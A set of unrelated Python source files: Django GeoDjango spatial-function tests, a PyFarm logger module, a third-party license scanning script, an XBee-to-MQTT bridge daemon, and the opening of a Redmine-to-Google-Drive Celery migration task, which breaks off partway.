self.assertTrue(20 <= ptown.size <= 40) # Exact value may depend on PostGIS version
@skipUnlessDBFeature("has_NumGeom_function")
def test_num_geom(self):
# Both 'countries' only have two geometries.
for c in Country.objects.annotate(num_geom=functions.NumGeometries('mpoly')):
self.assertEqual(2, c.num_geom)
qs = City.objects.filter(point__isnull=False).annotate(num_geom=functions.NumGeometries('point'))
for city in qs:
# Oracle and PostGIS return 1 for the number of geometries on
# non-collections, whereas MySQL returns None.
if mysql:
self.assertIsNone(city.num_geom)
else:
self.assertEqual(1, city.num_geom)
@skipUnlessDBFeature("has_NumPoint_function")
def test_num_points(self):
coords = [(-95.363151, 29.763374), (-95.448601, 29.713803)]
Track.objects.create(name='Foo', line=LineString(coords))
qs = Track.objects.annotate(num_points=functions.NumPoints('line'))
self.assertEqual(qs.first().num_points, 2)
if spatialite or mysql:
# Spatialite and MySQL can only count points on LineStrings
return
for c in Country.objects.annotate(num_points=functions.NumPoints('mpoly')):
self.assertEqual(c.mpoly.num_points, c.num_points)
if not oracle:
# Oracle cannot count vertices in Point geometries.
for c in City.objects.annotate(num_points=functions.NumPoints('point')):
self.assertEqual(1, c.num_points)
@skipUnlessDBFeature("has_PointOnSurface_function")
def test_point_on_surface(self):
# Reference values.
if oracle:
# SELECT SDO_UTIL.TO_WKTGEOMETRY(SDO_GEOM.SDO_POINTONSURFACE(GEOAPP_COUNTRY.MPOLY, 0.05))
# FROM GEOAPP_COUNTRY;
ref = {'New Zealand': fromstr('POINT (174.616364 -36.100861)', srid=4326),
'Texas': fromstr('POINT (-103.002434 36.500397)', srid=4326),
}
else:
# Using GEOSGeometry to compute the reference point on surface values
# -- since PostGIS also uses GEOS these should be the same.
ref = {'New Zealand': Country.objects.get(name='New Zealand').mpoly.point_on_surface,
'Texas': Country.objects.get(name='Texas').mpoly.point_on_surface
}
qs = Country.objects.annotate(point_on_surface=functions.PointOnSurface('mpoly'))
for country in qs:
tol = 0.00001 # Spatialite might have WKT-translation-related precision issues
self.assertTrue(ref[country.name].equals_exact(country.point_on_surface, tol))
@skipUnlessDBFeature("has_Reverse_function")
def test_reverse_geom(self):
coords = [(-95.363151, 29.763374), (-95.448601, 29.713803)]
Track.objects.create(name='Foo', line=LineString(coords))
track = Track.objects.annotate(reverse_geom=functions.Reverse('line')).get(name='Foo')
coords.reverse()
self.assertEqual(tuple(coords), track.reverse_geom.coords)
@skipUnlessDBFeature("has_Scale_function")
def test_scale(self):
xfac, yfac = 2, 3
tol = 5 # The low precision tolerance is for SpatiaLite
qs = Country.objects.annotate(scaled=functions.Scale('mpoly', xfac, yfac))
for country in qs:
for p1, p2 in zip(country.mpoly, country.scaled):
for r1, r2 in zip(p1, p2):
for c1, c2 in zip(r1.coords, r2.coords):
self.assertAlmostEqual(c1[0] * xfac, c2[0], tol)
self.assertAlmostEqual(c1[1] * yfac, c2[1], tol)
# Test float/Decimal values
qs = Country.objects.annotate(scaled=functions.Scale('mpoly', 1.5, Decimal('2.5')))
self.assertGreater(qs[0].scaled.area, qs[0].mpoly.area)
@skipUnlessDBFeature("has_SnapToGrid_function")
def test_snap_to_grid(self):
# Let's try and break snap_to_grid() with bad combinations of arguments.
for bad_args in ((), range(3), range(5)):
with self.assertRaises(ValueError):
Country.objects.annotate(snap=functions.SnapToGrid('mpoly', *bad_args))
for bad_args in (('1.0',), (1.0, None), tuple(map(six.text_type, range(4)))):
with self.assertRaises(TypeError):
Country.objects.annotate(snap=functions.SnapToGrid('mpoly', *bad_args))
# Boundary for San Marino, courtesy of Bjorn Sandvik of thematicmapping.org
# from the world borders dataset he provides.
wkt = ('MULTIPOLYGON(((12.41580 43.95795,12.45055 43.97972,12.45389 43.98167,'
'12.46250 43.98472,12.47167 43.98694,12.49278 43.98917,'
'12.50555 43.98861,12.51000 43.98694,12.51028 43.98277,'
'12.51167 43.94333,12.51056 43.93916,12.49639 43.92333,'
'12.49500 43.91472,12.48778 43.90583,12.47444 43.89722,'
'12.46472 43.89555,12.45917 43.89611,12.41639 43.90472,'
'12.41222 43.90610,12.40782 43.91366,12.40389 43.92667,'
'12.40500 43.94833,12.40889 43.95499,12.41580 43.95795)))')
Country.objects.create(name='San Marino', mpoly=fromstr(wkt))
# Because floating-point arithmetic isn't exact, we set a tolerance
# to pass into GEOS `equals_exact`.
tol = 0.000000001
# SELECT AsText(ST_SnapToGrid("geoapp_country"."mpoly", 0.1)) FROM "geoapp_country"
# WHERE "geoapp_country"."name" = 'San Marino';
ref = fromstr('MULTIPOLYGON(((12.4 44,12.5 44,12.5 43.9,12.4 43.9,12.4 44)))')
self.assertTrue(
ref.equals_exact(
Country.objects.annotate(
snap=functions.SnapToGrid('mpoly', 0.1)
).get(name='San Marino').snap,
tol
)
)
# SELECT AsText(ST_SnapToGrid("geoapp_country"."mpoly", 0.05, 0.23)) FROM "geoapp_country"
# WHERE "geoapp_country"."name" = 'San Marino';
ref = fromstr('MULTIPOLYGON(((12.4 43.93,12.45 43.93,12.5 43.93,12.45 43.93,12.4 43.93)))')
self.assertTrue(
ref.equals_exact(
Country.objects.annotate(
snap=functions.SnapToGrid('mpoly', 0.05, 0.23)
).get(name='San Marino').snap,
tol
)
)
# SELECT AsText(ST_SnapToGrid("geoapp_country"."mpoly", 0.5, 0.17, 0.05, 0.23)) FROM "geoapp_country"
# WHERE "geoapp_country"."name" = 'San Marino';
ref = fromstr(
'MULTIPOLYGON(((12.4 43.87,12.45 43.87,12.45 44.1,12.5 44.1,12.5 43.87,12.45 43.87,12.4 43.87)))'
)
self.assertTrue(
ref.equals_exact(
Country.objects.annotate(
snap=functions.SnapToGrid('mpoly', 0.05, 0.23, 0.5, 0.17)
).get(name='San Marino').snap,
tol
)
)
@skipUnlessDBFeature("has_SymDifference_function")
def test_sym_difference(self):
geom = Point(5, 23, srid=4326)
qs = Country.objects.annotate(sym_difference=functions.SymDifference('mpoly', geom))
for country in qs:
self.assertTrue(country.mpoly.sym_difference(geom).equals(country.sym_difference))
@skipUnlessDBFeature("has_Transform_function")
def test_transform(self):
# Pre-transformed points for Houston and Pueblo.
ptown = fromstr('POINT(992363.390841912 481455.395105533)', srid=2774)
prec = 3 # Precision is low due to version variations in PROJ and GDAL.
# Asserting the result of the transform operation with the values in
# the pre-transformed points.
h = City.objects.annotate(pt=functions.Transform('point', ptown.srid)).get(name='Pueblo')
self.assertEqual(2774, h.pt.srid)
self.assertAlmostEqual(ptown.x, h.pt.x, prec)
self.assertAlmostEqual(ptown.y, h.pt.y, prec)
@skipUnlessDBFeature("has_Translate_function")
def test_translate(self):
xfac, yfac = 5, -23
qs = Country.objects.annotate(translated=functions.Translate('mpoly', xfac, yfac))
for c in qs:
for p1, p2 in zip(c.mpoly, c.translated):
for r1, r2 in zip(p1, p2):
for c1, c2 in zip(r1.coords, r2.coords):
# The low precision is for SpatiaLite
self.assertAlmostEqual(c1[0] + xfac, c2[0], 5)
self.assertAlmostEqual(c1[1] + yfac, c2[1], 5)
# Some combined function tests
@skipUnlessDBFeature(
"has_Difference_function", "has_Intersection_function",
"has_SymDifference_function", "has_Union_function")
def test_diff_intersection_union(self):
"Testing the `difference`, `intersection`, `sym_difference`, and `union` GeoQuerySet methods."
geom = Point(5, 23, srid=4326)
qs = Country.objects.all().annotate(
difference=functions.Difference('mpoly', geom),
sym_difference=functions.SymDifference('mpoly', geom),
union=functions.Union('mpoly', geom),
)
# For some reason SpatiaLite does something screwey with the Texas geometry here.
# Also, it doesn't like the null intersection.
if spatialite:
qs = qs.exclude(name='Texas')
else:
qs = qs.annotate(intersection=functions.Intersection('mpoly', geom))
if oracle:
# Should be able to execute the queries; however, they won't be the same
# as GEOS (because Oracle doesn't use GEOS internally like PostGIS or
# SpatiaLite).
return
for c in qs:
self.assertTrue(c.mpoly.difference(geom).equals(c.difference))
if not (spatialite or mysql):
self.assertEqual(c.mpoly.intersection(geom), c.intersection)
self.assertTrue(c.mpoly.sym_difference(geom).equals(c.sym_difference))
self.assertTrue(c.mpoly.union(geom).equals(c.union))
@skipUnlessDBFeature("has_Union_function")
def test_union(self):
geom = Point(-95.363151, 29.763374, srid=4326)
ptown = City.objects.annotate(union=functions.Union('point', geom)).get(name='Dallas')
tol = 0.00001
# Undefined ordering
expected1 = fromstr('MULTIPOINT(-96.801611 32.782057,-95.363151 29.763374)', srid=4326)
expected2 = fromstr('MULTIPOINT(-95.363151 29.763374,-96.801611 32.782057)', srid=4326)
self.assertTrue(expected1.equals_exact(ptown.union, tol) or expected2.equals_exact(ptown.union, tol))
| |
# No shebang line, this module is meant to be imported
#
# Copyright 2013 Oliver Palmer
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Logger
======
Contains the root logger for PyFarm as well as the default
message formatting.
"""
import os
import sys
import json
import logging
import warnings
from logging import Formatter
from pyfarm.core.enums import INTERACTIVE_INTERPRETER
# Import or construct the necessary objects depending on the Python version
# and use sys.version_info directly to avoid possible circular import issues.
PY_MAJOR, PY_MINOR = sys.version_info[0:2]
PY26 = PY_MAJOR, PY_MINOR == (2, 6)
if (PY_MAJOR, PY_MINOR) >= (2, 7):
from logging import NullHandler, captureWarnings
from logging.config import dictConfig
else: # pragma: no cover
from logutils import NullHandler
from logutils.dictconfig import dictConfig
_warnings_showwarning = None
def _showwarning(message, category, filename, lineno, file=None, line=None):
"""
.. note::
This function is a copy of Python 2.7's ``_showwarning``
Implementation of showwarnings which redirects to logging, which will
first check to see if the file parameter is None. If a file is
specified, it will delegate to the original warnings implementation of
showwarning. Otherwise, it will call warnings.formatwarning and will
log the resulting string to a warnings logger named "py.warnings" with
level logging.WARNING.
"""
if file is not None:
if _warnings_showwarning is not None:
_warnings_showwarning(
message, category, filename, lineno, file, line)
else:
s = warnings.formatwarning(
message, category, filename, lineno, line)
logger = logging.getLogger("py.warnings")
if not logger.handlers:
logger.addHandler(NullHandler())
logger.warning("%s", s)
def captureWarnings(capture):
"""
.. note::
This function is a copy of Python 2.7's ``captureWarnings``
If capture is true, redirect all warnings to the logging package.
If capture is False, ensure that warnings are not redirected to logging
but to their original destinations.
"""
global _warnings_showwarning
if capture:
if _warnings_showwarning is None:
_warnings_showwarning = warnings.showwarning
warnings.showwarning = _showwarning
else:
if _warnings_showwarning is not None:
warnings.showwarning = _warnings_showwarning
_warnings_showwarning = None
if not INTERACTIVE_INTERPRETER:
try:
colorama
except NameError:
from colorama import init, Fore, Back, Style
init()
NO_STYLE = ("", "")
class ColorFormatter(Formatter):
"""
Adds colorized formatting to log messages using :mod:`colorama` so long
as we're not running an interactive interpreter or a debugger.
"""
if not INTERACTIVE_INTERPRETER:
FORMATS = {
logging.DEBUG: (Style.DIM, Style.RESET_ALL),
logging.WARNING: (Fore.YELLOW, Fore.RESET),
logging.ERROR: (Fore.RED, Fore.RESET),
logging.CRITICAL: (
Fore.RED + Style.BRIGHT, Fore.RESET + Style.RESET_ALL)}
# Python 2.6 uses old style classes which means we can't use
# super(). So we construct the proper method at the class level
# so we can safe an if statement for each function call.
if not PY26: # pragma: no cover
def format(self, record):
head, tail = self.FORMATS.get(record.levelno, NO_STYLE)
return head + super(ColorFormatter, self).format(record) + tail
else: # pragma: no cover
def format(self, record):
head, tail = self.FORMATS.get(record.levelno, NO_STYLE)
return head + Formatter.format(self, record) + tail
else:
warnings.warn_explicit(
"Interactive interpreter or debugger is active, "
"disabling colorized logging.", RuntimeWarning, "logger.py",
0, module="pyfarm.core.logger")
FORMATS = {
logging.DEBUG: NO_STYLE,
logging.WARNING: NO_STYLE,
logging.ERROR: NO_STYLE,
logging.CRITICAL: NO_STYLE}
class StandardOutputStreamHandler(logging.StreamHandler):
"""
This is exactly the same as :class:`logging.StreamHandler` the
only exception is we use ``sys.stdout`` by default. This class is
provided so it can be serialized as a string into a logging configuration
dictionary using json.
"""
if PY26:
def __init__(self, stream=sys.stdout):
logging.StreamHandler.__init__(self, stream)
else:
def __init__(self, stream=sys.stdout):
super(StandardOutputStreamHandler, self).__init__(stream=stream)
class config(object):
"""
Namespace class to store and setup the logging configuration. You
typically don't have to run the classmethods here manually but you may
do so under other circumstances if you wish.
"""
CONFIGURED = False
DEFAULT_CONFIGURATION = {
"version": 1,
"root": {
"level": os.environ.get("PYFARM_ROOT_LOGLEVEL", "DEBUG"),
"handlers": ["stdout"],
},
"handlers": {
"stdout": {
"class": "pyfarm.core.logger.StandardOutputStreamHandler",
"formatter": "colorized"
}
},
"formatters": {
"colorized": {
"()": "pyfarm.core.logger.ColorFormatter",
"datefmt": "%Y-%m-%d %H:%M:%S",
"format":
"%(asctime)s %(levelname)-8s - %(name)-15s - %(message)s"
}
}
}
@classmethod
def get(cls):
"""
Retrieves the logging configuration. By default this searches
:envvar:`PYFARM_LOGGING_CONFIG` for either a json blob containing
the logging configuration or a path to a json blob on disk. If
:envvar:`PYFARM_LOGGING_CONFIG` is not set then this function falls
back on :const:`pyfarm.core.logger.DEFAULT_CONFIGURATION`.
"""
# nothing left to do if it's not in the environment
if "PYFARM_LOGGING_CONFIG" not in os.environ:
return cls.DEFAULT_CONFIGURATION.copy()
environment_config = os.environ["PYFARM_LOGGING_CONFIG"].strip()
if not environment_config:
raise ValueError("$PYFARM_LOGGING_CONFIG is empty")
try:
with open(environment_config, "r") as stream:
try:
return json.load(stream)
except ValueError:
raise ValueError(
"Failed to parse json data from %s" % stream.name)
except (OSError, IOError):
try:
return json.loads(environment_config)
except ValueError:
raise ValueError(
"Failed to parse json data from $PYFARM_LOGGING_CONFIG")
@classmethod
def setup(cls, capture_warnings=True, reconfigure=False):
"""
Retrieves the logging configuration using :func:`get` and
then calls :meth:`.dictConfig` on the results.
:type capture_warnings: bool
:param capture_warnings:
If True then all emissions from :mod:`warnings` should instead
be logged
:type reconfigure: bool
:param reconfigure:
If True then rerun :func:`.dictConfig` even if we've already done
so.
"""
if not reconfigure and cls.CONFIGURED:
return
dictConfig(cls.get())
if capture_warnings:
captureWarnings(True)
cls.CONFIGURED = True
def getLogger(name):
"""
Wrapper around the :func:`logging.getLogger` function which
ensures the name is setup properly.
"""
config.setup()
if not name.startswith("pf."):
name = "pf.%s" % name
return logging.getLogger(name)
| |
#!/usr/bin/python
# Copyright 2014 Google Inc. All Rights Reserved.
"""License checking utility.
Utility for checking and processing licensing information in third_party
directories.
Usage: steel_licenses.py <command> <build_dir> [<output_file>]
build_dir is the directory where build products are generated.
Commands:
scan scan third_party directories, verifying that we have licensing info
license generate license HTML information to output file, or stdout.
"""
import fnmatch
import os
import re
import subprocess
import sys
def NativePath(path):
if sys.platform == 'cygwin':
import cygpath # pylint: disable=g-import-not-at-top
return cygpath.to_nt(path)
else:
return path
script_dir = os.path.abspath(os.path.dirname(__file__))
toplevel_dir = os.path.dirname(os.path.dirname(script_dir))
tools_dir = os.path.join(toplevel_dir, 'external', 'chromium', 'tools')
sys.path.insert(0, tools_dir)
import licenses # pylint: disable=g-import-not-at-top
build_dir = ''
# LayoutTests contains thousands of non-code directories, skip it.
licenses.PRUNE_DIRS += ('.repo', 'LayoutTests')
STEEL_ADDITIONAL_PATHS = (
os.path.join(toplevel_dir, 'external', 'chromium'),
os.path.join(toplevel_dir, 'external', 'openssl'),
)
# Paths from the root of the tree to directories to skip.
STEEL_PRUNE_PATHS = set([
# Same module occurs in both the top-level third_party and others.
os.path.join('third_party', 'jemalloc'),
# Assume we will never use anything from chrome or v8.
'chrome',
'v8',
])
licenses.ADDITIONAL_PATHS += STEEL_ADDITIONAL_PATHS
# Exclude this hardcoded path from licenses.py.
licenses.ADDITIONAL_PATHS = [
p for p in licenses.ADDITIONAL_PATHS
if p != os.path.join('v8', 'strongtalk')
]
licenses.PRUNE_PATHS |= STEEL_PRUNE_PATHS
# Directories where we check out directly from upstream, and therefore
# can't provide a README.chromium. Please prefer a README.chromium
# wherever possible.
# Default License File is "LICENSE"
STEEL_SPECIAL_CASES = {
os.path.join(toplevel_dir, 'external', 'chromium'): {
'Name': 'Chromium',
'URL': 'http://chromium.org',
'License': 'BSD',
},
os.path.join('third_party', 'freetype'): {
'Name': 'FreeType',
'URL': 'http://freetype.org',
'License': 'The FreeType Project LICENSE',
'License File': 'docs/FTL.TXT',
},
os.path.join('third_party', 'skia'): {
'Name': 'Skia',
'URL': 'http://chromium.org',
'License': 'BSD',
},
}
# we don't use v8
del licenses.SPECIAL_CASES[os.path.join('v8')]
licenses.SPECIAL_CASES = dict(
licenses.SPECIAL_CASES.items() + STEEL_SPECIAL_CASES.items())
def FindThirdPartyDependencies():
"""Scan Makefile deps to find all third_party uses."""
third_party_deps = set()
# Match third_party/<foo>/...
third_party_re = re.compile(r'third_party[\\/]([^ \t\n\r\f\v/\\]*)')
if not os.path.exists(build_dir):
print >> sys.stderr, 'Build directory', build_dir, 'does not exist'
for path, _, files in os.walk(build_dir):
for dep in fnmatch.filter(files, '*.d'):
f = open(os.path.join(path, dep), 'r')
dep_text = f.read()
matches = third_party_re.findall(dep_text)
for m in matches:
third_party_deps.add(m)
# Query the ninja deps database (this is mutually exclusive with .d files).
# Use -n to avoid trying to open the deps log for write. ninja is probably
# already running.
ninja_deps = subprocess.check_output(
['ninja', '-n', '-C', NativePath(build_dir), '-t', 'deps'])
matches = third_party_re.findall(ninja_deps)
for m in matches:
third_party_deps.add(m)
return third_party_deps
def CreateSteelPruneList(third_party_dirs):
"""Generate a list of third_party directories we don't use."""
third_party_deps = FindThirdPartyDependencies()
if not third_party_deps:
raise licenses.LicenseError(
'No dependencies found. Check the build directory.')
prune_paths = set()
for f in third_party_dirs:
if f.find('third_party') != -1:
for d in third_party_deps:
pattern = re.compile(d)
found = 0
if pattern.search(f):
found = 1
break
if not found:
prune_paths.add(f)
return prune_paths
def GenerateLicense(output_filename=None):
"""Generate list of licenses in html form.
Dumps the result to output file.
Args:
output_filename: Filename to write the license.html to.
Writes to stdout if None.
Returns:
0 on success.
"""
chromium_root = os.path.join(toplevel_dir, 'external', 'chromium')
third_party_dirs = set(licenses.FindThirdPartyDirs(licenses.PRUNE_PATHS,
chromium_root))
prune_paths = CreateSteelPruneList(third_party_dirs)
third_party_dirs -= prune_paths
entries = []
for path in sorted(third_party_dirs):
try:
metadata = licenses.ParseDir(path, chromium_root)
except licenses.LicenseError:
print >> sys.stderr, ('WARNING: licensing info for ' + path +
' is incomplete, skipping.')
continue
if metadata['License File'] != 'NOT_SHIPPED':
env = {
'name': metadata['Name'],
'url': metadata['URL'],
'license': open(metadata['License File'], 'rb').read(),
}
entries.append(env)
if output_filename:
output_file = open(output_filename, 'wb')
else:
output_file = sys.stdout
for e in entries:
output_file.write('<h4>\n')
output_file.write(e['name'] + '\n')
output_file.write('</h4>\n')
output_file.write('<pre>\n')
output_file.write(e['license'] + '\n')
output_file.write('</pre>\n')
return 0
def ScanDirectories():
"""Verify all directories (that we use) have valid license information."""
# The functions we call in licenses.py assume we are at the root.
os.chdir(toplevel_dir)
# Add all the directories we don't use to PRUNE_PATHS.
third_party_dirs = set(
licenses.FindThirdPartyDirs(licenses.PRUNE_PATHS, os.getcwd()))
prune_paths = CreateSteelPruneList(third_party_dirs)
licenses.PRUNE_PATHS = set(licenses.PRUNE_PATHS) | prune_paths
# Now verify the presence of a license file in all our third party dirs.
if licenses.ScanThirdPartyDirs():
print 'scan successful.'
return 1
def main():
command = 'help'
if len(sys.argv) > 2:
command = sys.argv[1]
global build_dir
build_dir = os.path.abspath(sys.argv[2])
if command == 'scan':
if not ScanDirectories():
return 1
elif command == 'license':
if len(sys.argv) > 3:
output_filename = sys.argv[3]
else:
output_filename = None
return GenerateLicense(output_filename)
else:
print __doc__
return 1
if __name__ == '__main__':
sys.exit(main())
| |
#!/usr/bin/python
# -*- coding:utf-8 -*-
#dependence: paho-mqtt (pip install paho-mqtt)
# XBee (pip install XBee)
# PyYAML (pip install PyYaml)
# pyserial (pip install pyserial)
import os
import sys
import time
import logging
import yaml
from serial import Serial
from factory import *
from pan import *
from filters import *
from plugins import *
from paho.mqtt import client
from daemon import Daemon
import sqlite3 as database
class PAN2MQTT(Daemon):
"""
PAN network to MQTT bridge
Supported PAN radio: XBee, Mesh Bee(from seeedstudio)
To port a new radio driver, two method must be implemented: on_message, send_message
"""
def __init__ (self, logger, cfg):
"""
"""
Daemon.__init__(self,cfg['general']['pidfile'])
self.logger = logger
self.config = cfg
self.mqtt_connected = False
self.mqtt_subcriptions = {}
self.downlink_topics = {}
self.uplink_topics = {}
self.pan = Factory(self.config['pan']['driver_class'])
if not self.pan:
self.__log(logging.ERROR, "Can't instant pan driver")
sys.exit(2)
self.pan.logger = logger
self.pan.on_message = self.on_message_from_pan
self.stdout = self.config['general']['stdout']
self.stderr = self.config['general']['stdout']
self.host = self.config['mqtt']['host']
self.client_id = self.config['mqtt']['client_id']
self.mqtt_qos = self.config['mqtt']['qos']
self.mqtt_retain = self.config['mqtt']['retain']
self.status_topic = self.config['mqtt']['status_topic']
self.mqtt_client = client.Client(self.client_id, self.config['mqtt']['clean_session'])
if self.__try_get_config(self.config['mqtt'], "username", None):
self.mqtt_client.username_pw_set(self.config['mqtt']['username'], self.config['mqtt']['password'])
if self.config['mqtt']['set_will']:
self.mqtt_client.will_set(self.status_topic.format(client_id=self.client_id), "0", self.mqtt_qos, self.mqtt_retain)
self.mqtt_client.on_connect = self.on_mqtt_connect
self.mqtt_client.on_disconnect = self.on_mqtt_disconnect
self.mqtt_client.on_message = self.on_message_from_mqtt
self.mqtt_client.on_subscribe = self.on_mqtt_subscribe
self.mqtt_client.on_log = self.on_mqtt_log
self.plugins = self.__try_get_config(self.config, 'plugin', None)
if not isinstance(self.plugins, dict):
self.plugins = {self.plugins}
self.plugins_ins = {}
### private method
def __log(self, level, message):
if self.logger:
self.logger.log(level, message)
@staticmethod
def __try_get_config (parent, key, default):
try:
return parent[key]
except:
return default
def __parse_nodes (self):
self.downlink_topics = {}
self.uplink_topics = {}
if self.config['pan']['nodes']:
for mac,mac_obj in self.config['pan']['nodes'].items():
for topic,topic_content in mac_obj.items():
topic = topic.format(client_id=self.client_id)
if topic_content['dir'] == "uplink":
self.uplink_topics[(mac, topic_content['match_key'])] = (topic,self.__try_get_config(topic_content,'filter',None))
elif topic_content['dir'] == "downlink":
self.downlink_topics[topic] = (mac, topic_content)
else:
self.__log(logging.ERROR, "Unknown 'dir'")
def __sub_downlink_topics (self):
if not self.mqtt_connected:
return
for t in self.downlink_topics:
rc, mid = self.mqtt_client.subscribe(t, self.mqtt_qos)
self.mqtt_subcriptions[mid] = t
self.__log(logging.INFO, "Sent subscription request to topic %s" % t)
def __filter (self, input, filter_config):
try:
filter = Factory(filter_config['type'])
if filter:
filter.configure(filter_config['parameters'])
if filter.validate():
return filter.process(input)
except:
pass
return input
#response topic list to client which requires this
def __resp_topic_list(self, dst_topic):
'''
Broadcast gateway information when the gateway thread is starting
'''
str_topic_holder = ''
if self.config['pan']['nodes']:
for mac,mac_obj in self.config['pan']['nodes'].items():
for topic,topic_content in mac_obj.items():
topic = topic.format(client_id=self.client_id)
if topic_content['dir'] == "uplink" and topic_content['type'] != "listening":
str_topic_holder = str_topic_holder + topic + "@"
print "topic list:" + str_topic_holder
self.mqtt_client.publish(dst_topic, str_topic_holder, 2)
###
def on_mqtt_connect (self, client, userdata, flags, rc):
if rc == 0:
self.__log(logging.INFO, "Connected to MQTT broker: %s" % self.host)
self.mqtt_client.publish(self.status_topic.format(client_id=self.client_id), "1")
self.mqtt_connected = True
self.__sub_downlink_topics()
else:
self.__log(logging.ERROR, "Could not connect to MQTT broker: %s" % self.host)
self.__log(logging.ERROR, "Error code: %d" % rc)
self.mqtt_connected = False
def on_mqtt_disconnect (self, client, userdata, rc):
self.mqtt_connected = False
self.__log(logging.INFO, "Disconnected from MQTT broker: %s"%self.host)
self.__log(logging.INFO, "Return code: %d"%rc)
if rc!=0:
self.__log(logging.ERROR, "Unexpected disconnect, waiting reconnect...")
def on_mqtt_subscribe (self,client, userdata, mid, granted_qos):
topic = self.mqtt_subcriptions.get(mid, "Unknown")
self.__log(logging.INFO, "Sub to topic %s confirmed"%topic)
def on_mqtt_log (self, client, userdata, level, buf):
self.__log(logging.DEBUG, buf)
def on_message_from_pan (self, mac, key, value, type):
self.__log(logging.INFO, "Received message from PAN: %s, %s:%s" % (mac, key, value))
#walk over plugins and determin whether to drop
'''
there are two callback in each plugin
1.on_message_from_pan abstract function in base
description: do something when receives pan event
2.pre_publish
description: do something before publish to broker
'''
for name,p in self.plugins_ins.items():
if not p.on_message_from_pan(mac, key, value, type):
return False
#search the topic
try:
if self.uplink_topics[(mac,key)]:
topic, filter = self.uplink_topics[(mac,key)]
#apply the filter
value_f = value
if filter:
value_f = self.__filter(value, filter)
#walk over plugins and call the callback which watches on the publishment
for name,p in self.plugins_ins.items():
if p.pre_publish:
p.pre_publish(topic, value_f, value)
#publish the topic
self.__log(logging.INFO, "Publishing to topic: %s"%topic)
self.mqtt_client.publish(topic, value_f, self.mqtt_qos, self.mqtt_retain)
except KeyError, e:
self.__log(logging.WARNING, "Received message unrecognized: %s" % e)
def on_message_from_mqtt (self,client, userdata, message):
self.__log(logging.INFO, "Received message from MQTT: %s: %s, qos %d" % (message.topic,message.payload,message.qos))
#walk over plugins and determin whether to drop
for name,p in self.plugins_ins.items():
if not p.on_message_from_mqtt(message.topic, message.payload, message.qos):
return False
#search the topic
if self.downlink_topics[message.topic]:
mac, topic = self.downlink_topics[message.topic]
#apply the filters
if self.__try_get_config(topic, 'filter', None):
value = self.__filter(message.payload, topic['filter'])
else:
value = message.payload
#handle the topic types
if topic['type'] == 'dio':
self.pan.send_message('dio', mac, value, port = topic['dio_num'])
#self.__log(logging.DEBUG, "sent dio message")
elif topic['type'] == 'data':
self.pan.send_message('data', mac, value)
elif topic['type'] == 'rpc':
pass
elif topic['type'] == 'listening':
#to specified client
self.__resp_topic_list(str(value))
else:
self.__log(logging.ERROR, "Unknown downlink handler type: %s" % topic['type'])
return
else:
self.__log(logging.ERROR,"Received an unknown topic '%s' from mqtt" % message.topic)
return
def do_reload (self):
self.__log(logging.DEBUG, "Reload not implemented now")
def run (self):
self.__log(logging.INFO, "Starting Pan2Mqtt %s" % self.config['general']['version'])
#parse nodes, up/down-link channels
self.__parse_nodes()
#connect mqtt
self.mqtt_client.connect(self.host, self.config['mqtt']['port'], self.config['mqtt']['keepalive'])
sec=0
while True:
if self.mqtt_connected:
break
else:
self.mqtt_client.loop()
sec=sec+1
if sec > 60:
self.stop()
sys.exit(2)
#connect pan radio
try:
serial = Serial(self.config['pan']['port'], self.config['pan']['baudrate'])
except Exception,e:
self.__log(logging.ERROR, "Can't open serial: %s" % e)
sys.exit(2)
self.pan.serial = serial
if not self.pan.connect():
self.stop()
#start the plugins
for p in self.plugins:
ins = Factory(p)
if ins:
self.plugins_ins[p] = ins
if self.__try_get_config(self.config['plugin'], p, None):
self.plugins_ins[p].config = self.config['plugin'][p]
self.plugins_ins[p].global_config = self.config
self.plugins_ins[p].send_to_pan = self.pan.send_message
self.plugins_ins[p].send_to_mqtt = self.mqtt_client.publish
self.plugins_ins[p].start()
else:
self.__log(logging.ERROR, "Can not make the instance of %s from factory"%p)
#blocking loop
try:
self.mqtt_client.loop_forever()
except KeyboardInterrupt:
self.__log(logging.ERROR, "Terminated by user")
self.cleanup()
def cleanup (self):
self.pan.disconnect()
self.__log(logging.INFO, "Cleaning up...")
self.mqtt_client.disconnect()
if os.path.exists(self.pidfile):
os.remove(self.pidfile)
for name, p in self.plugins_ins.items():
p.cleanup()
sys.exit()
def resolve_path(path):
return path if path[0] == '/' else os.path.join(os.path.dirname(os.path.realpath(__file__)), path)
if __name__ == '__main__':
config_file = './pan2mqtt.yaml'
fh = file(resolve_path(config_file), 'r')
config = yaml.load(fh)
fh.close()
handler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
logger = logging.getLogger()
logger.setLevel(config['general']['log_level'])
logger.addHandler(handler)
gw = PAN2MQTT(logger, config)
if len(sys.argv) == 2:
if 'start' == sys.argv[1]:
gw.start()
elif 'stop' == sys.argv[1]:
gw.stop()
elif 'restart' == sys.argv[1]:
gw.restart()
elif 'reload' == sys.argv[1]:
gw.reload()
elif 'foreground' == sys.argv[1]:
gw.run()
else:
print "Unknown command"
sys.exit(2)
sys.exit(0)
else:
print "usage: %s start|stop|restart|foreground" % sys.argv[0]
sys.exit(2)
| |
import os
import random
import datetime
from hashlib import md5
import redis
import simplejson
import celery
import magic
from googleapiclient.http import MediaFileUpload
from celery.utils.log import get_task_logger
from celery import Celery, current_task
from sqlalchemy.exc import IntegrityError
from sqlalchemy import exists, and_
from apiclient import errors
import celeryconfig
from model import *
from db import db_session
from google_api import drive_service
__author__ = 'rdfm'
logger = get_task_logger(__name__)
app = Celery()
app.config_from_object('celeryconfig')
random.seed()
REDIS_CLIENT = redis.Redis()
def get_basedir():
basedir = db_session.query(RedmineBasedirToDriveMapping).filter_by(redmine_id=0).first()
if basedir and basedir.drive_id:
return basedir.drive_id
return None
class RedmineMigrationTask(celery.Task):
"""An abstract Celery Task that ensures that the connection the the
database is closed on task completion"""
abstract = True
lock_expire = 5 # 5 minutes
def __init__(self, *a, **kw):
super(RedmineMigrationTask, self).__init__(*a, **kw)
self.__lock_key = None
self.__lock = None
self.__locked = False
def lock_key(self, *a, **kw):
if not a:
a = self.request.args
if not kw:
kw = self.request.kwargs
